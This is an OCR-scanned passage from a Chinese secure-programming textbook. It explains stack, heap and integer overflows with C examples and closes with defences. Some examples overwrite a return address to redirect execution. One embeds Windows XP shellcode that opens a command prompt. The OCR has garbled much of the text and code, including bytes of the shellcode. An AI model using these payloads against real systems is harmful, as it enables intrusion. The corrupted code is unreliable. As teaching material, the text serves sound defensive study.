。 堆栈 底部 地 址 固定 ; 

。 堆栈 的 大 小 在 运行 时 由 内 核 动 态 地 调整 ; 

。 CPU 实现 指令 PUSH 和 POP 来 向 堆栈 中 添加 元 素 和 从 中 移 去 元 素 。 

当 调 用 函数 时 ,要 保存 的 现场 数据 被 压 人 堆栈 中 ; 当 函 数 返回 时 ,数据 从 堆栈 中 弹 
出 。 当 然 , 堆 栈 中 的 数据 可 能 比较 复杂 ,如 包括 函数 的 参数 、 函 数 局 部 变量 等 。 观 察 如 
下 例子 : 


了 P02_01.c 


void function(int a, int b) 


// 相关 代码 
} 
void main() 
{ 
function(1,2); 


该 程序 中 定义 了 一 个 函数 function, 它 有 两 个 输入 参数 ; 还 定义 了 一 个 主 函数 
main, 用 来 调用 function。 将 该 文件 放 入 Turboc 环境 中 (如 C:\Turboc2) ,运行 如 下 命 
令 ,将 源 代码 编译 并 生成 汇编 代码 输出 : 


C:\turhoc2>tcc -S P82_Q@1.c 


在 C:\Turboc2 下 生成 了 一 个 P02_01. ASM 文件 ,用 文本 编辑 器 打开 ,可 见 如 下 
代码 片段 : 


P02_01. ASM( 片 段 ) 


_main proc near 
; ?debug L5 
mov ax, 2 
push ax 
mov axy 1 
push ax 
call near ptr _function 


从 中 可 以 发 现 ,main 函数 里 面 调用 function 函数 的 时 候 , 两 个 实际 参数 2 和 1 被 
压 人 堆栈 中 ,然后 才 用 指令 call 调用 function 函数 。 将 2 和 1 压 人 堆栈 .就 相当 于 保存 
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了 现场 。 
2.1.2 缓冲 区 溢出 


缓冲 区 溢出 是 一 种 非常 普遍 、 非 常 危 险 的 漏洞 。 它 有 多 种 英文 名 称 ,如 buffer 
overflow、buffer overrun、smash the stack、trash the stack ,等 等 , 它 也 是 一 种 比较 有 历 
史 的 漏洞 ,多 个 著名 的 漏洞 报告 都 和 缓冲 区 溢出 有 关 , 在 各 种 操作 系统 .应 用 软件 中 广 
泛 存 在 。 缓 冲 区 溢出 ,可 以 导致 的 后 果 包 括 : 

。 程序 运行 失败 ; 

。 系统 当 机 , 重 新 启动 ; 

。 攻击 者 可 能 利用 它 执行 非 授权 指令 ,取得 系统 特权 ,进而 进行 各 种 非法 操作 ， 


提示 “一 个 非常 著名 的 缓冲 区 溢出 攻击 是 Morris 蠕虫 , 它 也 是 利用 了 某 些 机 器 
上 某 些 软件 存在 的 缓冲 区 溢出 漏洞 ,在 1988 年 , 它 曾 造成 全 世界 大 量 网 络 服 务 器 竣 痰 。 
读者 可 以 参考 相关 资料 。 

缓冲 区 溢出 的 概念 很 简单 。 缓 冲 区 溢出 是 指 当 计算 机 向 缓冲 区 内 填充 数据 时 超过 
了 缓冲 区 本 身 的 容量 而 溢出 ; 某 些 情况 下 ,溢出 的 数据 只 是 覆盖 在 一 些 不 太 重要 的 内 
存 空间 上 ,不 会 产生 严重 后 果 ; 但 是 一 旦 溢出 的 数据 覆盖 在 合法 数据 上 ,可 能 给 系统 带 
来 巨大 的 危害 。 如 下 代码 : 


void function(char * input) 
{ 
char buffer[16]; 
strcpy(buffer, input); 
} 


strcpy() 直 接 将 input 中 的 内 容 copy 到 buffer 中 。 只 要 input 的 长 度 大 于 16 ,就 
会 造成 buffer 的 溢出 。 当 然 , 这 里 所 说 的 缓冲 区 ,实际 上 就 存在 于 上 节 所 叙述 的 “ 堆 
栈 ? 区 内 。 


提示 ”读者 可 以 假设 最 理想 的 情况 是 : 程序 对 输入 字符 串 长 度 进行 检查 ,确保 输 
入 的 长 度 不 超过 缓冲 区 允许 的 长 度 ; 但 是 在 复杂 的 程序 中 ,并 不 是 每 个 程序 员 都 会 考 
虑 到 这 一 点 。 很 多 程序 员 都 会 假定 输入 的 长 度 不 会 超过 数组 大 小 ,如 果 一 厢 情 愿 地 假 
设 数 据 长 度 总 是 与 所 分 配 的 存储 空间 匹配 ,就 为 缓冲 区 溢出 埋 下 了 隐患 。 攻 击 者 通过 
往 程 序 的 缓冲 区 写 超出 其 长 度 的 内 容 , 造 成 缓冲 区 的 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程 
序 转 而 执行 其 他 指令 ,以 达到 攻击 的 目的 。 


存在 像 strcpy 这 样 问题 的 标准 函数 还 有 : 


® strcat(); 


。 sprintf(); 
。 vsprintf(); 
。 gets(); 
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。 scanf() ,等 等 (具体 情况 可 以 参考 相应 文档 ) 。 
下 面 用 一 个 程序 来 阐述 缓冲 区 溢出 的 具体 过 程 : 


P02_02.c 


#include < stdio.h> 
#include < string.h> 
void function(char * input) 
{ 
char buffer[10]; 
strcpy(buffer, input) 7 
printf("buffer = % s\n",buffer); 
int main( int argc, char * argv[]) 
{ 
function(argv[1]); 
return 0; 


} 


在 Turboc2 下 生成 exe 文件 (具体 过 程 可 以 参考 Turboc2 的 用 法 ): P02_02. exe， 
到 达 该 文件 存放 的 目录 ,在 命令 行 下 输入 如 下 命令 : 
输出 : 


因为 function 函数 中 的 buffer 大 小 定义 为 10, 在 输入 参数 没有 超过 10 字 节 的 情 
况 下 ,程序 没有 问题 。 
但 如 果 输 入 字 节 数 大 于 10 的 参数 : 


>P@2_@2 abcdef ghijklmnopqrstuvwxyz 


程序 出 现 错误 提示 ,如 图 2-2 所 示 。 


P02_02. exe - 应 用 程序 栈 误 划 
“0x004012fe” 指令 引用 的 “0x00007a79” 内 存 。 该 内 存 不 能 为 “read"。 
请 单 击 “确定 ”。 
请 单 击 "时 时 


图 2-2 


很 显然 ,这 不 正常 。 读 者 可 以 自行 实验 。 

上 面 的 程序 ,之 所 以 出 现 * 应 用 程序 错误 ,是 因为 当 程序 写 人 超过 缓冲 区 的 大 小 
时 ,产生 “缓冲 区 溢出 ”。 缓 冲 区 溢出 本 身 并 不 可 怕 ,关键 是 发 生 缓冲 区 溢出 时 ,会 覆盖 
下 一 个 相 邻 的 内 存 块 。 

本 章 是 基于 C 语言 进行 讲解 ,由 于 C 语言 具有 不 安全 性 的 某 些 特 性 , 它 允 许 程序 
溢出 缓冲 区 (当然 ,也 许 这 种 溢出 是 出 于 偶然 )。 在 这 个 程序 中 , 当 发 生 缓冲 区 溢出 时 ， 


18 


软件 安全 实现 一 一 安全 编程 技术 


可 能 会 导致 很 多 不 可 预料 的 行为 ,如 : 

。 程序 的 执行 很 奇怪 ; 

。 程序 完全 失败 ,等 等 。 

当然 ,不 可 否认 ,也 有 可 能 出 现 男 一 种 情况 ,程序 碰巧 没有 获 盖 重要 数据 ,程序 可 以 
继续 ,而 且 在 执行 中 没有 任何 明显 不 正常 ,但 是 具备 安全 隐患 。 该 问题 给 软件 的 维护 带 
来 了 难度 。 存 在 缓冲 区 溢出 隐患 的 程序 ,隐患 的 发 作 是 不 确定 的 ,这 使 得 对 它们 的 调试 
异常 棘手 。 


提示 ”上 一 段 所 叙述 的 情况 实际 上 是 一 种 最 坏 情况 : 在 一 种 环境 下 (如 开发 阶段 
的 测试 过 程 中 ) ,程序 可 能 发 生 了 缓冲 区 溢出 ,但 因为 没有 履 盖 重要 数据 ,根本 没有 任何 
不 正常 ; 但 在 另 一 种 环境 下 ,可 能 在 发 生 溢出 时 ,碰巧 地 修改 了 分 配 在 缓冲 区 附近 的 数 


据 , 程 序 执行 发 生 不 正常 现象 。 从 维护 的 角度 讲 , 因 为 这 种 事情 完全 是 “碰巧 ”, 等 到 维 


护 人 员 去 维护 时 ,问题 就 找 不 到 了 ,白白 花费 维护 人 员 的 精力 ,并 且 问 题 可 能 得 不 到 本 
质 解决 。 

缓冲 区 溢出 有 时 候 可 能 改变 程序 流程 。 举 一 个 简单 的 例子 ,如 果 碰 巧 在 缓冲 区 后 
面 的 内 存 中 有 一 个 布尔 变量 ,该 变量 值 为 true(1) 或 false(0) ,决定 用 户 是 否 可 以 执行 
某 个 敏感 操作 。 如 果 该 变量 被 缓冲 区 溢出 的 数据 覆盖 ,变量 值 可 能 由 false(0) 变 为 


。 true(1) ,程序 的 执行 流程 就 被 更 改 。 
2.1.3 缓冲 区 溢出 案例 


缓冲 区 溢出 的 危害 取决 于 以 下 几 点 : 

， 写 入 的 数据 中 有 和 多少 溢 出 ; 

。 溢出 的 数据 覆盖 了 哪些 数据 ; 

。 程 序 是 否 试图 读 取 溢出 时 被 覆盖 的 数据 ,等 等 。 

上 节 例 子 给 出 了 缓冲 区 溢出 的 发 生机 制 。 当 然 , 随 便 往 缓冲 区 中 填 入 内 容 , 让 缓冲 
区 汶 出 ,一 般 只 是 出 现 一 些 异 常 现象 ,项 多 让 程序 崩溃 ,而 不 能 达到 刻意 攻击 的 目的 。 

站 在 攻击 者 角度 ,让 用 户 程序 崩溃 ,属于 没有 什么 技术 含量 的 攻击 。 最 常见 的 手段 


， 是 , 通过 输入 一 段 数据 ,造成 缓冲 区 溢出 ,让 程序 运行 一 个 用 户 命令 。 极端 情况 下 ,如 
。 果 该 程序 属于 管理 员 具 有 针对 系统 的 任意 操作 权限 的 情况 ,攻击 者 就 可 以 利用 这 个 漏 
。 洞 造成 更 大 的 危害 。 


下 面 用 一 个 例子 来 讲解 缓冲 区 攻击 的 原理 。 所 使 用 的 环境 为 DevC++ 5. 0, 操 作 系 


统 为 Microsoft Windows XP。 用 户 也 可 在 Microsoft Visual C++ 6. 0 环境 下 调试 、 测 
， 试 。 代 码 如 下 : 


P02_03.c 


#include < stdio.h> 
# include < string.h> 
void funl(char * input) 
{ 
char buffer[10]; 
strcpy(buffer, input) 
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printf("Call funl, buffer = % s\n",buffer); 
} 
int main(int argc, char * argv[]) 
{ 
funl(argv[1]); 
return 0; 


由 该 代码 生成 exe 文件 (具体 和 相应 的 IDE 有 关 ) ,在 命令 行 中 运行 : 
结果 为 : 
Gall funi,buffer=Security 
这 是 正常 的 。 如 果 输 入 一 个 长 度 大 于 10 的 字符 串 , 如 : 
>P02_63 abcdef ghijklmnopqrstuv 
显示 正常 (这 是 碰巧 正常 ): 
但 如 果 输 入 : 
则 提示 如 图 2-3 所 示 。 


习 
“0x36353433” 指令 引用 的 “0x36353433” 内 存 。 该 内 存 不 能 为 “read"。 
计生 

mm 


图 2-3 


下 面 分 析 以 下 错误 的 提示 : 
“0x36353433” 指 令 引 用 的 “0x36353433” 内 存 。 该 内 存 不 能 为 “read”。 


该 错误 提示 中 ,出 现 了 一 个 "0x36353433","0x36" 是 字符 6 的 ASCII 码 ,"0x35" 是 
字符 5 的 ASCII 码 ,"0x34" 是 字符 4 的 ASCII 码 ,"0x33" 是 字符 3 的 ASCII 码 。 这 说 
明 什么 问题 ? 

该 问题 出 现 的 原因 是 ,由 于 输入 的 字符 串 太 长 ,数组 buffer 容纳 不 下 ,但 是 也 要 将 
多 余 的 字符 写 人 堆栈 。 这 些 多 余 的 字符 没有 分 配合 法 的 空间 ,就 会 覆盖 堆栈 中 以 前 的 
内 容 。 如 果 覆 盖 的 内 容 仅仅 是 一 些 普通 数据 ,表面 上 也 不 会 出 什么 问题 ,只 是 会 造成 原 
有 数据 的 丢失 。 

但 是 ,堆栈 中 还 有 一 块 区 域 专门 保存 着 指令 指针 ,存放 下 一 个 CPU 指令 存放 的 内 
存 地 址 (可 以 理解 为 某 个 函数 的 地 址 ) 。 如 果 该 处 被 覆盖 ,系统 会 错误 地 将 覆盖 的 新 值 
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让 % 
当成 某 个 指令 来 执行 。 如 上 面 的 例子 中 ,刚好 是 "3456"(0x36353433) 覆 盖 了 那 一 片 


区 


域 ,系统 会 将 "3456"(0x36353433) 的 ASCII 码 视 作 返回 地 址 ,认为 程序 接 下 来 要 执行 
的 是 0x36353433 所 指向 的 那个 函数 ,因此 试图 执行 0x36353433 处 的 指令 ,出 现 难以 预 


全 内 料 的 后 时 (程序 出 错 退出 ) 。 


但 是 ,仅仅 让 程序 出 错 退出 并 没有 什么 用 。 如 果 将 该 处 的 内 容 不 用 "3456" 覆 盖 ,,i 


用 某 一 个 函数 的 地 址 覆盖 ,就 可 以 运行 那个 函数 了 ! 
编写 新 的 代码 : 
P02_04. c 


#include < stdio.h> 
# include < string.h> 
void funl(char * input) 


char buffer[10]; 
strcpy(buffer, input) ; 
printf("Call funl, buffer = % s\n", buffer); 


void fun2() 


printf("Call fun2"); 
} 


int main( int argc, char * argv[]) 


printf("Address Of fun2 = %p\n", fun2); 
funl(argv[1]); 
return 0; 


x 


生成 可 执行 文件 后 ,运行 如 下 命令 : 
显示 : 


Address Of fun2=9946912BD 
Gall funi.buffer=abcde 


此 处 ,fun2 函数 的 地 址 为 0x004012BD。 输 入 : 


>PB2_94 abcdefghijklnnopqrstuvuxyz1234567890 
报错 如 图 2-4 所 示 。 


P02_03. exe - 应 用 稳 序 鳍 误 划 
“0x36353433” 指令 引用 的 “0x36353433” 内存。 该 内 存 不 能 为 “read'。 


要 终止 程序 ,请 单 击 “确定 ”。 
要 凋 试 程序 ， 博 单 击 “ 取 宵 ”- 


mw | 


图 2-4 
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该 处 情况 和 前 面 一 样 (注意 ,并 不 是 所 有 的 程序 都 会 这 样 ) ,说 明 在 0x36353433 处 
保存 了 下 一 个 即将 运行 的 函数 地 址 ,用 fun2 地 址 (004012BD) 去 覆盖 输入 参数 中 
"3456" 所 在 的 内 存 , 伪 造 下 一 个 函数 的 地 址 ,编写 如 下 代码 : 


P02_05.¢c 


#include <stdio.h> 
# include < string.h> 
void funl(char * input) 


char buffer[10]; 

strcpy(buffer, input) ; 

printf("Call funl, buffer = % s\n",buffer); 
void fun2() 

printf("Call fun2"); 

int main(int argc, char * argv[]) 
printf("Address Of fun2 = % p\n", fun2); 


funl("abcdefghijklmnopqrstuvwxyz12\xBD\x12\x40"); 
return 0; 


运行 P02_05. exe 文件 ,控制 台 上 显示 : 


Address Of fun2=994912BD 


Call funi.buffer=abcdefghijklnnopqrstuvwxyz12?@ 
Call fun2 


注意 ,fun2 函数 被 调用 了 ! 

下 面 再 举 一 个 例子 : 

在 中 文 版 Windows 2000、Windows 2003、Windows XP 中 ,指令 通用 跳 转 地 址 为 
0x7ffa4512, 如 果 命 令 该 指令 执行 ,程序 就 可 以 跳 转 到 其 他 地 方 ,运行 其 他 程序 ,程序 可 
以 用 shellcode 来 表示 (有 关 shellcode, 大 家 可 以 参考 相应 的 文献 )。 如 以 下 shellcode 
代码 ,表示 打开 一 个 命令 行 窗口 : 


"\x55\x8B\xEC\x33\xCO\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" 
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6" 
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" 

"\x77\xld\x80\x7c" 

"\x52\x8D\x45\xF4A\x50\xFF\x55\xFO" 
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E" 
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" 
"\x50\xB8" 

"\xc7\x93\xbf\x77" 

"\xFF\xDO" 

"\x83\xC4\x12\x5D" 
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编写 如 下 代码 : 


P02_06.c 


# include < stdio.h> 
#include < string.h> 


Note void funl(char * input) 


{ 


char buffer[10]; 
strcpy(buffer, input); 
printf("Call funl, buffer = % s\n", buffer); 
} 
int main(int argc, char * argv[]) 
{ 
char buffer[] = "abcdefghijklmnopqrstuvwxyz12\x12\x45\xfa\x7f" 
"\x55\x8B\xEC\x33\xCO\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" 
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6" 
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA" 
"\x77\xld\x80\x7c" 
"\x52\x8D\x45\xF4\x50\xFF\x55\xF0" 
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4A\xB8\x61\x6E\x64\x2E" 
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4" 
"\x50\xB8" 
"\xc7\x93\xbf\x77" 
"\xFF\xDO" 
"\x83\xC4\x12\x5D" ; 
funl(buffer); 
return 0; 


} 


运行 相应 exe 文件 : 


~“W3.0\ch@2\ch@2>P82_06 .exe 


运行 时 能 够 打开 的 控制 台 命 令 窗 口 如 图 2-5 所 示 。 


and Prompt 


Microsoft <R> Windows DOS 
《CCopyright Microsoft Corp 1990-2801. 


如 果 有 权限 ,可 以 进行 任意 操作 。 
2.1.4 堆 溢 出 


前 面 叙 述 实 际 上 是 属于 堆栈 溢 


出 。 堆 栈 溢出 又 叫做 静态 缓冲 区 (注意 ,不 是 静态 存 
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储 区 ) 溢 出 ,堆栈 大 小 是 在 exe 文件 中 就 定好 的 ,是 固定 的 。 | 

和 堆栈 类 似 的 另 一 个 概念 是 堆 , 堆 在 底层 和 堆栈 的 运行 机 制 不 一 样 , 堆 的 底层 区 域 
是 程序 员 编 程 时 想 要 动态 获得 内 存 的 地 方 ,一 般 通 过 new、malloc() 等 函数 来 分 配 空 
间 , 在 此 种 情况 下 ,如 果 处 理 不 当 , 会 产生 堆 溢 出 。 

看 以 下 例子 : 


P02_07.c 


#include < stdio.h> 
#include < string.h> 
# include < stdlib.h> 


main (int argc，char * argv[]) 

{ 
Char * bufferl, * buffer2; 
char str[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x03\x00\x05\x00\x00\x09"; 
bufferl = (char* )malloc (32); 
buffer2 = (char* )malloc (16); 
/* 向 bufferl 中 复制 ,多 复制 6 字 节 */ 
memcpy (bufferl, str, 32+6); 
free (bufferl1); 
free (buffer2); 
return 0; 


} 


生成 exe 文件 后 ,运行 : 


D:NE\ 安 全 编程 技术 W3.6\ch82\ch82>P82_07.exe| 


效果 如 图 2-6 所 示 。 
Ei| 


@ “0x7c948beb” 指 令 引 用 的 “0x61816181” 内 存 。 该 内 存 不 能 为 “read”。 


EL 


取消 


图 2-6 


造成 以 上 问题 的 原因 是 : 由 于 向 bufferl 中 复制 数据 时 ,多 复制 了 6 字 节 ,这 6 字 
节 会 覆盖 掉 buffer2 的 结构 ,在 free(buffer2) 时 会 发 生 异 常 。 
攻击 者 如 果 精 心 构造 这 6 字 节 ,也 可 以 达到 攻击 的 目的 。 


2.1.5 缓冲 区 溢出 攻击 


缓冲 区 溢出 攻击 ,由 于 实现 起 来 比较 方便 ,成 为 一 种 常见 的 安全 攻击 手段 。 因 此 ， 
相对 于 其 他 漏洞 ,缓冲 区 溢出 漏洞 比较 普遍 。 

1998 年 ,Lincoln 实验 室 针对 入 侵 检测 ,对 各 种 远程 攻击 方法 进行 了 评估 ,最 后 得 
出 了 5 种 最 严重 的 远程 攻击 方法 ,其 中 有 两 种 是 缓冲 区 溢出 ; 而 在 1998 年 CERT 的 
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13 份 建议 中 ,有 9 份 是 与 缓冲 区 溢出 有 关 的 ,在 1999 年 ,至 少 有 半数 的 建议 是 和 缓冲 
区 溢出 有 关 的 。 在 Bugtraq 的 调查 中 ,有 2/3 的 被 调查 者 认为 缓冲 区 溢出 漏洞 是 一 个 
很 严重 的 安全 问题 中 。 

攻击 者 可 以 通过 很 多 手段 利用 缓冲 区 溢出 漏洞 并 且 进 行 攻击 。 一 般 说 来 ,利用 
缓冲 区 溢出 攻击 的 目的 在 于 使 攻击 者 取得 某 些 程序 的 控制 权 , 执 行 某 些 特权 功能 ， 
实现 非法 操作 ; 极端 情况 下 ,如 果 该 程序 具有 管理 员 的 权限 ,那么 就 相当 于 控制 了 整 


攻击 者 为 了 达到 目的 ,一 般 情况 下 ,攻击 行为 分 为 两 步 进行 。 

第 一 步 : 在 程序 的 地 址 空间 放 入 一 些 攻击 性 的 数据 ,故意 让 缓冲 区 溢出 。 该 方法 
中 一 般 有 两 种 攻击 方式 : 

(1) 直接 输入 法 。 攻 击 者 向 被 攻击 的 程序 输入 一 个 字符 串 , 让 缓冲 区 溢出 ,程序 会 


把 这 个 字符 串 放 到 缓冲 区 里 。 而 该 字符 串 中 包含 某 个 指令 序列 ,攻击 者 因而 猜测 出 可 


以 攻击 的 漏洞 地 址 。 
(2) 传递 参数 法 。 在 这 种 情况 下 ,攻击 者 想 要 执行 的 代码 存在 于 漏洞 程序 中 ,只 需 


要 传递 一 些 参数 就 可 以 让 它 运 行 ; 例如 ,攻击 代码 要 求 执行 exec(“ 某 个 命令 ”) ,而 在 


， 击 程序 。 


被 攻击 程序 的 库 中 有 一 个 函数 为 exec (arg) ,那么 攻击 者 只 需要 将 命令 参数 传 给 被 攻 


第 二 步 : 精心 设计 溢出 的 数据 ,让 程序 执行 攻击 者 预想 的 功能 ,也 就 是 改变 程序 的 


执行 流程 , 跳 转 到 攻击 者 安排 的 攻击 代码 。 


怎样 让 程序 跳 转 到 相应 的 程序 代码 ,一般 情 况 下 有 如 下 方法 : 

， 利 用 男 一 个 函数 的 返回 地 址 。 函 数 调用 时 ,堆栈 中 会 留 下 函数 结束 时 返回 的 地 
址 ,指示 函数 结束 后 会 执行 的 功能 。 攻 击 者 可 以 通过 缓冲 区 溢出 ,改变 程序 的 
返回 地 址 ,使 返回 地 址 为 攻击 代码 。 

。 直接 利用 函数 指针 。 由 于 函数 指针 可 以 用 来 定位 函数 的 位 置 , 攻 击 者 只 需 在 函 
数 指针 附近 将 缓冲 区 溢出 ,用 一 个 攻击 函数 的 指针 来 覆盖 原 有 函数 指针 ,达到 
攻击 目的 。 


提示。 这 里 举 一 个 具体 的 案例 由 。 本 世纪 初 ,Cerberus 安全 小 组 发 布 了 微软 的 


IIS 4/5 存在 一 个 缓冲 区 溢出 漏洞 。 攻 击 该 漏洞 ,可 以 使 Web 服务 器 戎 溃 , 甚 至 获取 起 


级 权限 ,执行 任意 的 代码 。 该 缓冲 区 溢出 漏洞 对 于 网 站 的 安全 构成 了 极 大 威胁 。 它 的 


”攻击 过 程 描述 如 下 : 


。 浏览 器 向 IIS 提出 一 个 HTTP 请 求 ,在 域名 (或 IP 地 址 ) 后 ,加 上 一 个 文件 名 ， 
该 文件 名 的 后 组 为 . htr; 

TIS 收 到 请 求 之 后 ,由 于 没有 进行 检查 , 它 会 认为 客户 端正 在 请 求 一 个 . htr 文 
件 , 此 时 ,htr 扩展 名 文件 被 映像 成 ISAPI(Internet Service API) 应 用 程序 ; 

JIS 将 所 有 针对 .htr 资 源 的 请 求 定向 到 ISM. DLL 程序 ,ISM. DLL 打开 这 个 文 
件 并 执行 ; 

浏览 器 将 提交 请 求 中 包含 的 文件 名 存储 在 缓冲 区 中 , 若 它 很 长 ,会 导致 局 部 变 
量 缓冲 区 溢出 ,覆盖 返回 地 址 空间 ,使 IIS 崩溃 。 更 进一步 ,在 缓冲 区 中 植 入 一 
段 精心 设计 的 代码 ,可 以 使 之 以 系统 超级 权限 运行 。 
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2.1.6 防范 方法 


如 前 所 述 ,缓冲 区 溢出 的 原理 ,是 通过 将 远程 恶意 代码 注入 到 目标 程序 中 以 实现 攻 
击 的 方法 。 就 程序 本 质 而 言 ,缓冲 区 溢出 的 根本 原因 是 由 于 像 C.C++ 语 言 本 身 的 不 安 
全 (如 没有 任何 数组 的 界限 检查 和 指针 引用 的 检查 ) ,因此 ,检查 边界 成 为 最 有 效 的 工 ， 
作 ; 否则 ,程序 将 冒 着 存在 漏洞 的 风险 。 

解决 缓冲 区 溢出 的 方法 有 如 下 几 种 : 

(1) 积极 检查 边界 。 由 于 C 和 C++ 允许 任意 的 缓冲 区 溢出 ,没有 任何 的 缓冲 区 溢 
出 边界 检测 机 制 来 进行 限制 ,因此 ,一 般 情况 下 ,所 有 开发 者 需要 手动 在 自己 的 代码 中 
添加 边界 检测 机 制 。 

不 过 ,也 有 一 些 优化 的 技术 来 减少 手工 检查 的 次 数 。 如 使 用 Richard Jones 和 Paul 
Kelly 开发 的 gcc 补丁 、 利 用 Compaq 的 C 编译 器 等 。 

(2) 不 让 攻击 者 执行 缓冲 区 内 的 命令 。 这 种 方法 使 攻击 者 即使 在 被 攻击 者 的 缓冲 ， 
区 中 植 和 了 执行 代码 之 后 ,也 无 法 执行 被 植 入 的 代码 。 具 体 方法 大 家 可 以 参考 相关 的 
文献 。 

(3) 编写 品质 良好 的 代码 。 养 成 一 个 习惯 ,不 要 因为 一 味 追 求 程序 性 能 ,而 编写 一 
些 安全 隐患 较 多 的 代码 ,特别 是 不 要 使 用 一 些 可 能 有 漏洞 的 API, 减 少 漏洞 发 生 的 可 
能 。 可 以 用 一 些 查 错 工具 ,限制 一 些 可 能 具有 缓冲 区 溢出 漏洞 攻击 的 函数 调用 (如 
strcpy 和 sprintf 等 ) 。 

(4) 程序 指针 检查 。 程 序 指针 检查 不 同 于 边界 检查 ,程序 指针 检查 是 一 旦 修改 了 
程序 指针 ,就 会 被 检测 到 ,被 改变 的 指针 将 不 被 使 用 。 这 样 ,即使 一 个 攻击 者 成 功 地 改 
变 了 程序 的 指针 ,因为 系统 事先 检测 到 了 指针 的 改变 ,这 个 指针 将 不 会 被 使 用 ,攻击 者 ， 
就 达 不 到 攻击 的 目的 。 


2.2 整数 溢出 


2.2.1 整数 的 存储 方式 


几乎 所 有 的 高 级 语言 中 都 有 整数 的 概念 。 一 个 整数 ,在 计算 范围 内 ,是 内 存 中 的 
一 个 变量 ,也 是 一 个 没有 小 数 部 分 的 实数 。 在 不 同 的 系统 中 ,整数 存储 的 方式 各 不 
相同 。 以 int 为 例 ,在 Turbo C 中 ,一 个 整数 用 2 字 节 (16 位 ) 存 放 ; 在 某 些 C 编译 器 
(如 DevC++) 中 ,整数 用 4 字 节 (32 位 ) 存 放 ; 在 Java 语言 中 ,一 个 整数 用 4 字 节 
(32 位 ) 存 放 。 为 了 简便 起 见 , 这 里 谈 到 的 整数 特 指 是 用 4 字 节 存 放 的 32 位 整数 。 不 
过 ,很 多 语言 中 对 于 整数 还 有 其 他 数据 类 型 的 细 分 ,如 : 

。 字 节 整数 byte; 

。 短 整数 short; 

。 长 整数 long; 

。 无 符号 整数 unsigned, 等 等 。 
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相关 内 容 , 大 家 根据 不 同 语言 来 参考 相关 文档 。 本 章 如 果 没有 特别 提示 ,一般 所 述 
是 int 型 整数 。 
在 实际 使 用 过 程 中 ,人 们 经 常 使 用 的 整数 表达 (编码 ) 方 式 是 十 进 制 , 因 此 ,通常 用 
十 进 制 来 表示 整数 。 但 是 计算 机 不 能 直接 处 理 十 进 制 ,所 以 在 计算 机 中 ,整数 以 二 进 制 
进行 存储 。 但 是 ,二 进 制 又 太 长 ,不 好 表达 ,因此 ,有 时 候 又 用 十 六 进 制 表示 ,因为 二 进 
制 和 十 六 进 制 能 够 很 方便 地 转换 。 
对 于 有 符号 的 整数 ,在 32 位 系统 下 , 正 数 的 存储 方式 就 是 其 二 进 制 ,如 2, 在 内 存 
中 的 存储 方式 为 : 
00000000 00000000 00000000 00000010 
十 六 进 制 表示 为 0x00000002 。 
负数 的 存储 方式 一 般 是 其 补 码 (绝对 值 取 反 十 1) 。 如 一 2 的 存储 方法 是 : 
首先 取 绝 对 值 2 ,存储 方式 为 : 
00000000 00000000 00000000 00000010 


取 反 ,成 为 : 
11111111 11111111 11111111 11111101 


加 1 ,成 为 : 
LILULTIL LTTL T1111L 11111110 

十 六 进 制 表 示 为 0xFFFFFFFE。 

一 般 说 来 ,如 果 最 高 位 置 1, 这 个 变量 就 解释 为 负数 ; 如 果 置 0, 这 个 变量 就 解释 为 

正 数 。 

还 有 一 种 是 无 符号 整数 ,不 管 最 高 位 是 1 还 是 0, 都 理解 为 正 数 。 如 : 
liitiiitlaatiat ittlaraitl0 

如 果 理 解 为 无 符号 类 型 ,将 是 一 个 很 大 的 数 。 


2.2.2 整数 溢出 


什么 情况 下 会 出 现 整数 溢出 呢 ? 
由 于 整数 在 内 存 里 保存 在 一 个 固定 长 度 〈 在 本 章 中 使 用 32 位 ) 的 空间 内 , 它 能 存 


。 储 的 最 大 值 就 是 国定 的 , 当 尝 试 去 存储 一 个 数 ,而 这 个 数 又 大 于 这 个 轿 定 的 最 大 值 时 ， 
将 会 导致 整 数 溢出 。 


举 个 例子 ,有 两 个 无 符号 的 整数 ,numl 和 num2 ,两 个 数 都 是 32 位 长 ,首先 赋值 给 


。 numl 一 个 32 位 整数 的 最 大 值 .num2 被 赋值 为 1。 然 后 让 numl 和 num2 相 加 ,结果 


为 num3 ,代码 如 下 : 
numl = OxFFFFFFFF; 
num2 = 0x00000001; 
num3 = numl + num2; 


很 显然 ,numl 的 值 是 11111111 11111111 11111111 11111111; 
num2 的 值 是 00000000 00000000 00000000 00000001; 
两 者 相 加 ,得 到 结果 为 00000000 00000000 00000000 00000000。 因 此 ,num3 中 的 
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值 是 0, 发 生 了 整数 溢出 。 


此 时 ,如 果 一 个 整数 用 来 计算 一 些 敏感 数值 ,如 缓冲 区 大 小 或 数组 索引 ,就 会 产生 
潜在 的 危险 。 

不 过 ,并 不 是 所 有 的 整数 溢出 都 可 以 被 利用 ,毕竟 ,整数 溢出 并 没有 改写 额外 的 内 
存 ; 但 是 ,在 有 些 情况 下 ,整数 溢出 将 会 导致 “不 能 确定 的 行为 ”, 由 于 整数 溢出 出 现 之 后 ， 
很 难 被 立即 察觉 ,比较 难 用 一 个 有 效 的 方法 去 判断 是 否 出 现 或 者 可 能 出 现 整数 溢出 。 

就 发 现 的 难度 而 言 ,和 缓冲 区 溢出 相 比 ,整数 溢出 更 加 难 被 发 现 。 因 此 ,即使 是 审 
核 过 的 代码 ,有 时 候 也 难以 幸免 。 

